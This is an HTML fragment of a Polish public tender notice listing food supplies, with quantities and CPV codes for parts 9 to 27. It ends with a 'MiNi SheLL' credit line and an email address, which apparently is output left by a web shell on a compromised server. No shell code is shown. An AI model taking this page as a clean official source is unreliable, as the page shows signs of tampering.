<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta	kg	60
bułki 50g	szt	200
chleb krojony pszenny 0,6 kg	szt	4000
chleb ziarnisty 400g	szt	200
drożdżówki	szt	100
pączki 100g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza jęczm. Średnia	kg	40
kasza manna	kg	20
mąka pszenna typu 450	kg	120
mąka pszenna typu 500	kg	120
mąka ziemiaczna	kg	20
platki kukur. 500 g	szt	10
platki kukur.kakaowe 250g	szt	40
platki kukur.kakaowe 500g	szt	7
płatki kukurydz. 250G	szt	38
ryż 1kg	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> barszcz czerwony- koncentrat 300 ml 	szt	40
baton czekoladowy nadziewany	szt	50
bialy barszcz	szt	40
budyń 40 g	szt	200
cukier	kg	350
cukier puder  0,5 kg	szt	40
cukier waniliowy 30g	szt	40
cynamon 15g	szt	10
czekolada pełnomleczna	szt	50
drożdże 100 g	szt	30
galaretka owocowa	szt	150
hebata expres owocowa 25 szt	szt	10
herbata expres 100 szt	szt	80
jarzynka 200 g	szt	11
kakao rozpuszczalne 300 g	szt	30
kawa rozpuszczalna naturalna	szt	2
kawa rozpuszczalna zboż typu inka	szt	20
keczup 480 g 	szt	25
keczup pikantny 480g	szt	25
kisiel 38 g	szt	200
krem czekoladowo orzechowy 200 g	szt	20
krem czekoladowo orzechowy 400 g	szt	10
krem czekoladowy 200 g	szt	200
krem czekoladowy 400 g	szt	10
kwasek cytrynowy 20 g	szt	80
liść laurowy 6 g	szt	40
magi w plynie 960 ml	szt	38
majeranek 15 g	szt	20
majonez   700 g  	szt	20
majonez  400 g 	szt	40
makaron gniazda 1 kg	szt	30
makaron nitka cięta 1 kg 	szt	40
makaron rurki 1 kg	szt	20
makaron spagetti 0,5 kg	szt	70
makaron świderki 1kg	szt	50
mikołaj czekoladowy	szt	50
miód sztuczny 200 g	szt	15
musztrda tuba 0.5 l	szt	14
Ocet 10% 500 ml	szt	10
papryka mielona 20 g	szt	30
paprykarz szczeciń 131 g	szt	60
pasztet 135 g z pomidorami	szt	50
pasztet puszka 160 g	szt	50
pieprz mielony 20 g	szt	250
pieprz ziolowy 20 g	szt	10
proszek do pieczenia 30 g	szt	41
przyprawa do grilla 20 g	szt	16
przyprawa do kurczaka 25 g	szt	30
przyprawa do mięsa 75 g  	szt	40
przyprawa gyros 25 g	szt	10
rosół drobiowy kostki 60 g -120 g	szt	20
sos fix do spagetti 45 g	szt	200
sos mix koper-zioł, włoski itp. 9 g	szt	50
sos sałatkowy mix  9 g	szt	50
sól	kg	100
vegeta 200 g	szt	80
wafelek w polewie	szt	50
wiórki kokosowe 200 g	szt	10
zelatyna 50 g	szt	10
ziele angielskie 15 g	szt	35
zupki  chińska (ostra,łagodna rosołowa itp.)	szt	150
zurek w proszku 60 g	szt	240
żurek w butelce 0,5 l	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Margaryna  do pieczenia 250g	szt	20
margaryna z masłem 500g	szt	250
olej 1l	szt	120
smalec 200g	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jogurt owocowy 150g	szt	50
jogurt pitny 200g	szt	100
jogurt z owocami 115g	szt	600
masło śmietank. 200G	szt	800
mleko 3,2% 1l UHT	szt	520
ser edamski	kg	40
ser gouda	kg	40
ser morski	kg	40
ser salami	kg	20
ser top. krążek 140g	szt	80
ser topiony kielbaski 100g	szt	85
ser twarogowy 200g	szt	100
ser twarogowy półtusty	kg	50
ser tylżycki	kg	40
serek grani  150g	szt	50
serek homogenizowany 200g	szt	50
serek kanapk Twarożk 125g	szt	300
serek twarożkowy w kubeczku 150g	szt	200
set topiony kostka 100g	szt	500
śmietana 30% 0,5l 	szt	5
śmietana 12% - słodka 0,5l UHT	szt	40
śmietana 18% 400ml - zakwaszana	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	10
napoje niegazowane 1,5 l	szt	10
woda mineralna 0,5 gazowana	szt	50
woda 0,5 n/g 	szt	50
woda mineralna n/g 1,5 l 	szt	20
woda mineralna g 1,5 l 	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 - cukiernicze produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas (w syropie) 580 ml	szt	12
Brzoskwinia (w syropie) 850 ml	szt	12
Chałwa 	kg	10
Cukier kryształ	kg	200
Cukier puder	kg	60
Cukier waniliowy	kg	2
Cynamon	kg	1
Dekoracje róże duże	op	2
Dekoracje róże średnie	op	2
Drożdże	kg	10
Emulgator (pronto)	kg	5
Esencja anyżowa 800 ml	szt	1
Esencja cytrynowa 800 ml 	szt	1
Esencja migdałowa 800 ml	szt	1
Esencja waniliowa 800 ml	szt	1
Galaretki różne	kg	5
Gałka muszkatałowa mielona	kg	0,5
Gożdzik mielony	kg	0,5
Isomalt	kg	5
Jabłko prażone	kg	50
Jajka	szt	3000
Kakao	kg	10
Kokos medium	kg	5
Krem budyniowy (na zimno) ideal	kg	20
Kuwertura biała	kg	5
Kuwertura deserowa	kg	30
Kasza manna	kg	13
Mak niebieski	kg	50
Mąka pszenna tortowa	kg	300
Mąka ziemniaczana	kg	50
Marcepan (50%)	kg	10
Margaryna (80%)	kg	220
Margaryna puff	kg	60
Marmolada	kg	20
Masa marcepanowa ticino	kg	10
Masa orzechowa	kg	10
Masa ticino	kg	10
Masło	kg	60
Mleko 3,2% UHT 1l	szt	40
Migdały 	kg	5
Miód płynny	kg	2
Olej 	l	45
Orzech laskowy	kg	5
Orzech włoski	kg	5
Orzech ziemny	kg	5
Pomada wodna	kg	40
Proszek do pieczenia	kg	1
Przyprawa korzenna	kg	5
Rodzynki	kg	16
Skórka pomarańczowa	kg	15
Spirytus cukierniczy	l.	5
Stabilizator neutral	kg	5
Syrop skrobiowy 	kg	15
Śmietana naturalna 30% 1l	szt	50
Tłuszcz cukierniczy	kg	2
Tłuszcz frytura	l	15
Toffi (kajmak)	kg	10
Twaróg świeży	kg	55
Wiśnia kandyzowana w syropie	kg	13
Wiśnia kandyzowana  sucha	kg	8
Żelatyna spożywcza	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cytryny	kg	3
jabłka	kg	13
pomarańcze	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowy 400-450 ml	szt	6
brzoskwinie konserwowe 900 ml	szt	6
rodzynki 100 g	szt	3
orzechy włoskie	kg	1,5
śliwki suszone 250 g	szt	3
sok malinowy 970 ml	litry	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły 	szt	6
buraki	kg	6
cebula	kg	6
czosnek	szt	10
fasola drobna 0.5 kg	szt	3
fasola Jaś	kg	1,5
fasola szparagowa	kg	1,5
groch 0,5 kg	szt	3
kalafior 	szt	6
kapusta biała	kg	12
kapusta czerwona	kg	4,5
kapusta pekińska	szt	8
koper	szt	6
marchew	kg	14,5
natka pietruszki	szt	6
ogórek świeży	kg	6
papryka świeża	kg	6
pieczarki	kg	9
pietruszka	kg	4
pomidor	kg	3
por	kg	3
sałata zielona	szt	6
seler	kg	6
ziemniaki	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> czerwona fasola 400 g	szt	4
groszek konserwowy 400 g	szt	8
kapusta kiszona	kg	7,5
koncentrat buraczany 300 ml	szt	7
koncentrat pomidorowy 0,9l	szt	6
kukurydza konserwowa 400-450 g	szt	8
ogórek kiszony	kg	5
ogórek konserwowy 0,9l	szt	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek wędzony	kg	2
filet z piersi kurczaka	kg	7,0
karkówka	kg	3
kiełbasa śląska	kg	1,5
korpus drobiowy	kg	6
kurczak   ( szt )	kg	3,6
łopatka	kg	4
schab świeży	kg	3
wątróbka drobiowa	kg	1,5
żołądki drobiowe	kg	1,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet rybny panga	kg	3
filety śledzowe matias	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta 0,5 kg	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza gryczana	kg	1,5
kasza manna	kg	2
mąka pszenna	kg	12
mąka ziemniaczana	kg	2,5
ryż saszetki 400 g	szt	6
ryż	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bazylia 10 g	szt	3
budyń 40 g	szt	15
cukier	kg	6
galaretka owocowa	szt	15
kisiel 35-50 g	szt	12
kostki rosłowe (bulion 60-120 g)	szt	12
kwas cytrynowy 15-20 g	szt	5
liść laurowy 6 g	szt	6
magi 960 ml	szt	3
majeranek 8 g	szt	10,0
majonez 700 g	szt	9
makaron	kg	3
musztarda stołowa 165-190 g	szt	3
papryka mielona słodka 20 g	szt	6
pieprz 20 g	szt	6
pieprz cayenne 15 g	szt	6
przyprawa do kurczaka 25 g	szt	6
przyprawa do mięsa typu Delicat 175 g	szt	6
sól	kg	2
tymianek 15 g	szt	3
vegeta 200 g	szt	3
ziele angielskie 15g 	szt	3
żelatyna 50 g	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> olej	litry	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> masło 200 g	szt	6
mleko 3,2% UHT	litry	10
ser biały (twaróg)	kg	6
ser typu feta 	szt	6
ser żółty	kg	3
śmietana 12% 1/2 l	szt	4
śmietana zakwasz. 18% 400ml	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com